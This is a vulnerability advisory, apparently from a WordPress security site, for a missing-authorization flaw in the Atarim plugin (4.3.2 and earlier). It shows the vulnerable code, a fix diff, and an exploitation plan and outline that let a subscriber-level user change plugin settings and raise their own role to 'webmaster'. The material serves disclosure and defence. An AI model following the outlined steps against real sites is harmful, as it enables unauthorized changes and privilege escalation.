Atarim <= 4.3.2 - Missing Authorization
Description
The Atarim plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=4.3.2What Changed in the Fix
Changes introduced in v4.3.3
Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2026-32447 ## 1. Vulnerability Summary The **Atarim – Visual Feedback, Review & AI Collaboration** plugin (v4.3.2 and below) contains a **Missing Authorization** vulnerability. The vulnerability exists because certain sensitive functions, specifically those relate…
Show full research plan
Exploitation Research Plan - CVE-2026-32447
1. Vulnerability Summary
The Atarim – Visual Feedback, Review & AI Collaboration plugin (v4.3.2 and below) contains a Missing Authorization vulnerability. The vulnerability exists because certain sensitive functions, specifically those related to license activation and settings updates, fail to perform sufficient capability checks. While the code includes checks like is_user_logged_in() and a custom avc_allowed_user_role() check, these do not properly restrict access to administrative users (e.g., those with manage_options). This allows authenticated users with low privileges, such as Subscribers, to trigger administrative actions like updating the plugin's license, changing site settings, or elevating their own plugin-specific user role to "webmaster."
2. Attack Vector Analysis
- Vulnerable Hook:
init - Vulnerable Function:
AVC_Settings::avc_license_activation() - HTTP Parameter(s):
atarim_response(The new license key, base64 encoded)page(A base64 encoded string containing the nonce inatarim_state)site_id(The site ID)
- Authentication Level: Subscriber (Authenticated)
- Preconditions: The attacker must obtain a valid nonce for the action
avc_new_license_activation. In Atarim, this nonce is often
Summary
The Atarim plugin (<= 4.3.2) fails to perform a capability check in the avc_license_activation function, which is triggered via the init hook. This allows authenticated users with subscriber-level permissions to update sensitive plugin options, such as the license key and site ID, and elevate their own plugin-specific status to 'webmaster'.
Vulnerable Code
// admin/class-avc-settings.php lines 73-125 public function avc_license_activation() { if (! isset($_GET['atarim_response'])) { return; } if ( ! is_admin() || ! is_user_logged_in() || ! $this->function->avc_allowed_user_role() || ! isset($_GET['page']) ) { wp_safe_redirect(AVC_HOME_URL); exit; } $page_raw = sanitize_text_field(wp_unslash($_GET['page'])); $page_decoded = base64_decode($page_raw, true); if (false === $page_decoded) { wp_safe_redirect(AVC_HOME_URL); exit; } $parsed = []; parse_str('page=' . $page_decoded, $parsed); $page_slug = isset($parsed['page']) ? $parsed['page'] : ''; $atarim_state = isset($parsed['atarim_state']) ? $parsed['atarim_state'] : ''; if ('atarim-visual-collaboration' !== $page_slug) { wp_safe_redirect(AVC_HOME_URL); exit; } // Verify nonce / state. if ( empty( $atarim_state ) || ! wp_verify_nonce( $atarim_state, 'avc_new_license_activation' ) ) { wp_safe_redirect(AVC_HOME_URL); exit; } if (strpos($_GET['atarim_response'], '%3D') !== false) { $atarim_response = substr($_GET['atarim_response'], -1, 3); } else { $atarim_response = $_GET['atarim_response']; } $user_id = $this->function->avc_get_user_detail('id'); $this->function->avc_update_settings('avc_license', base64_decode(sanitize_text_field($atarim_response))); $avc_site_id = sanitize_text_field($_GET['site_id']); $this->function->avc_update_settings('avc_site_id', $avc_site_id); $this->function->avc_update_settings('avc_initial_setup_complete', 'yes'); $this->function->avc_update_settings('avc_collab_active', 'yes'); update_user_meta($user_id, 'avc_user_type', 'webmaster', false); $this->function->avc_get_whitelabel(); wp_safe_redirect(AVC_HOME_URL); exit(); }
Security Fix
Only in /home/deploy/wp-safety.org/data/plugin-versions/atarim-visual-collaboration/4.3.3/admin: class-avcf-settings.php Only in /home/deploy/wp-safety.org/data/plugin-versions/atarim-visual-collaboration/4.3.2/admin: class-avc-settings.php @@ -3,7 +3,7 @@ exit; } -class AVC_User_Meta { +class AVCF_User_Meta { public function __construct() { // Display checkbox add_action('show_user_profile', [$this, 'add_webmaster_checkbox']); @@ -51,7 +51,7 @@ return; } - if (isset($_POST['avc_user_type']) && $_POST['avc_user_type'] === 'webmaster') { + if (isset($_POST['avc_user_type']) && sanitize_text_field(wp_unslash($_POST['avc_user_type'])) === 'webmaster') { update_user_meta($user_id, 'avc_user_type', 'webmaster'); } else { delete_user_meta($user_id, 'avc_user_type'); @@ -59,4 +59,4 @@ } } -new AVC_User_Meta(); \ No newline at end of file +new AVCF_User_Meta();
Exploit Outline
To exploit this vulnerability, an attacker first authenticates as a Subscriber and retrieves a valid nonce for the 'avc_new_license_activation' action. The attacker then constructs a GET request targeting an administrative path (satisfying is_admin()) with specific parameters: 'atarim_response' (a base64-encoded dummy license), 'site_id', and a base64-encoded 'page' parameter containing the valid nonce and the slug 'atarim-visual-collaboration'. Because the plugin relies on is_admin() and a weak custom role check (avc_allowed_user_role) instead of current_user_can('manage_options'), the server-side logic in avc_license_activation() will execute, updating global plugin settings and setting the attacker's 'avc_user_type' meta to 'webmaster'.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.